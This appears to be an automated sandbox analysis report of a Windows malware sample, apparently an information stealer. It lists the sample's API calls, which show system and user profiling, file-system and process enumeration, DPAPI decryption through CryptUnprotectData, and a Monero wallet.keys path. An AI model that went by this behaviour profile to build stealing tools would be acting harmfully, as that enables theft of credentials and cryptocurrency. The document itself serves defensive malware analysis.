GetKeyboardLayoutList.USER32(00000000,00000000,003805AF), ref: 00377BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00377BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00377C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00377C62
LocalFree.KERNEL32(00000000), ref: 00377D22

Strings

/ , xrefs: 00377C7F

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 2a7bb999a2ac0e0386f48f2e9994a40ee219966736a963f1ec3e1cc04291192f
Instruction ID: f00fc7242676ebe0a2afb149f99b27bafd3de57185164371173f4f18d02379d3
Opcode Fuzzy Hash: 2a7bb999a2ac0e0386f48f2e9994a40ee219966736a963f1ec3e1cc04291192f
Instruction Fuzzy Hash: 36412F71940218ABDB35DB54DC99BEEB778FF58700F108199E10966191DB382F85CF51

Function 0036E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00380D73), ref: 0036E4A2
StrCmpCA.SHLWAPI(?,003814F8), ref: 0036E4F2
StrCmpCA.SHLWAPI(?,003814FC), ref: 0036E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0036EBDF

Strings

\*.*, xrefs: 0036E44D

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 5c691f3bb1ca7faca446506e7f822edff94c11bc20127269715935e7390f4904
Instruction ID: 506e02da33cb99c56c88fd34996e78507cedbfb48ea30985efdbe8e840e84d72
Opcode Fuzzy Hash: 5c691f3bb1ca7faca446506e7f822edff94c11bc20127269715935e7390f4904
Instruction Fuzzy Hash: BC1267719106186BDB6AFB70DC96DEE7378AF94300F4081A8B50E5A091EF385F49CF92

Function 00379600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0037961E
Process32First.KERNEL32(00380ACA,00000128), ref: 00379632
Process32Next.KERNEL32(00380ACA,00000128), ref: 00379647
StrCmpCA.SHLWAPI(?,00000000), ref: 0037965C
CloseHandle.KERNEL32(00380ACA), ref: 0037967A

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 9fbc68b35811886bdba6270fc3a302b1356bf613b7f0903dcc0766b4f1f4d04e
Instruction ID: 8761919dbe54a4acd8ad54d8862168e8ea8b2416ec97e4266c4ec1dc0af7eacc
Opcode Fuzzy Hash: 9fbc68b35811886bdba6270fc3a302b1356bf613b7f0903dcc0766b4f1f4d04e
Instruction Fuzzy Hash: A9011E75A00208EBCB25DFA5DD48BEEB7F8EB58310F108289A90A97240D7389B44DF51

Function 00377A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0114E3A8,00000000,?,00380E10,00000000,?,00000000,00000000), ref: 00377A63
RtlAllocateHeap.NTDLL(00000000), ref: 00377A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0114E3A8,00000000,?,00380E10,00000000,?,00000000,00000000,?), ref: 00377A7D
wsprintfA.USER32 ref: 00377AB7

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 52d6457fd6da62a7f4d06a06d5c3857c8408ac402092273a3e1a185ba155213b
Instruction ID: e55e6fbbf417d14c6cb47885fc1afc6c31661863d4e132d540b35a1c2d5aa95c
Opcode Fuzzy Hash: 52d6457fd6da62a7f4d06a06d5c3857c8408ac402092273a3e1a185ba155213b
Instruction Fuzzy Hash: 9411ACB1905218EBEB608B54CC49FA9B7B8FB00721F0042DAE90AA3280C7785A44CF91

Function 00369B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00369B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00369BA3
LocalFree.KERNEL32(?), ref: 00369BD3

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 6c298edfe31a6b4258f8da902cbafd5653d8f0300c5a002a020f7ebe04590d06
Instruction ID: 83778595a35289576dafc63fd9a5182753b186293174ecf5593e478bf4f598da
Opcode Fuzzy Hash: 6c298edfe31a6b4258f8da902cbafd5653d8f0300c5a002a020f7ebe04590d06
Instruction Fuzzy Hash: 64110CB4A00209DFDB04DF94D985AAE77B9FF89300F108559F81597350D774AE14CFA1

Function 00377850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377880
RtlAllocateHeap.NTDLL(00000000), ref: 00377887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0037789F

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 26ff1f3ebb04dc7577e12500f92b7bd2ea2fff69388e2d63d5ccdf6b53e8f449
Instruction ID: 315247a222ac180b746b3f8e093398ebf5d81e86b17a6f7c784ce847fb0eeb84
Opcode Fuzzy Hash: 26ff1f3ebb04dc7577e12500f92b7bd2ea2fff69388e2d63d5ccdf6b53e8f449
Instruction Fuzzy Hash: 58F04FB1944209ABC710DF98DD4AFAEBBB8EB05B11F10025AFA05A2680C7781904CBA2

Function 00361160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0036116A
ExitProcess.KERNEL32 ref: 0036117E

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 74ea6bd036cef156e0b435e98e27bf04131631dd6b3c994140c3873376b7abf7
Instruction ID: 405828dbc73fd703684a3bd96fdbbf15902309044cc3001197e97f6403561abf
Opcode Fuzzy Hash: 74ea6bd036cef156e0b435e98e27bf04131631dd6b3c994140c3873376b7abf7
Instruction Fuzzy Hash: 8CD05E7490030CDBCB00DFE0D8496EEBB78FB09311F000554D90562340EB305886CAA6

Function 00379C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,011356B0), ref: 00379C2D
GetProcAddress.KERNEL32(74DD0000,011357F0), ref: 00379C45
GetProcAddress.KERNEL32(74DD0000,011496B8), ref: 00379C5E
GetProcAddress.KERNEL32(74DD0000,01149670), ref: 00379C76
GetProcAddress.KERNEL32(74DD0000,011496D0), ref: 00379C8E
GetProcAddress.KERNEL32(74DD0000,01149610), ref: 00379CA7
GetProcAddress.KERNEL32(74DD0000,0113B748), ref: 00379CBF
GetProcAddress.KERNEL32(74DD0000,0114D020), ref: 00379CD7
GetProcAddress.KERNEL32(74DD0000,0114D080), ref: 00379CF0
GetProcAddress.KERNEL32(74DD0000,0114D098), ref: 00379D08
GetProcAddress.KERNEL32(74DD0000,0114CEA0), ref: 00379D20
GetProcAddress.KERNEL32(74DD0000,01135810), ref: 00379D39
GetProcAddress.KERNEL32(74DD0000,011356F0), ref: 00379D51
GetProcAddress.KERNEL32(74DD0000,01135A70), ref: 00379D69
GetProcAddress.KERNEL32(74DD0000,01135970), ref: 00379D82
GetProcAddress.KERNEL32(74DD0000,0114CE58), ref: 00379D9A
GetProcAddress.KERNEL32(74DD0000,0114D0C8), ref: 00379DB2
GetProcAddress.KERNEL32(74DD0000,0113B5E0), ref: 00379DCB
GetProcAddress.KERNEL32(74DD0000,011359D0), ref: 00379DE3
GetProcAddress.KERNEL32(74DD0000,0114CF90), ref: 00379DFB
GetProcAddress.KERNEL32(74DD0000,0114CFF0), ref: 00379E14
GetProcAddress.KERNEL32(74DD0000,0114CFA8), ref: 00379E2C
GetProcAddress.KERNEL32(74DD0000,0114CEB8), ref: 00379E44
GetProcAddress.KERNEL32(74DD0000,011359F0), ref: 00379E5D
GetProcAddress.KERNEL32(74DD0000,0114CFC0), ref: 00379E75
GetProcAddress.KERNEL32(74DD0000,0114CE70), ref: 00379E8D
GetProcAddress.KERNEL32(74DD0000,0114CFD8), ref: 00379EA6
GetProcAddress.KERNEL32(74DD0000,0114CE40), ref: 00379EBE
GetProcAddress.KERNEL32(74DD0000,0114CDF8), ref: 00379ED6
GetProcAddress.KERNEL32(74DD0000,0114D068), ref: 00379EEF
GetProcAddress.KERNEL32(74DD0000,0114CED0), ref: 00379F07
GetProcAddress.KERNEL32(74DD0000,0114CF78), ref: 00379F1F
GetProcAddress.KERNEL32(74DD0000,0114D0B0), ref: 00379F38
GetProcAddress.KERNEL32(74DD0000,0114A420), ref: 00379F50
GetProcAddress.KERNEL32(74DD0000,0114CE10), ref: 00379F68
GetProcAddress.KERNEL32(74DD0000,0114D038), ref: 00379F81
GetProcAddress.KERNEL32(74DD0000,011356D0), ref: 00379F99
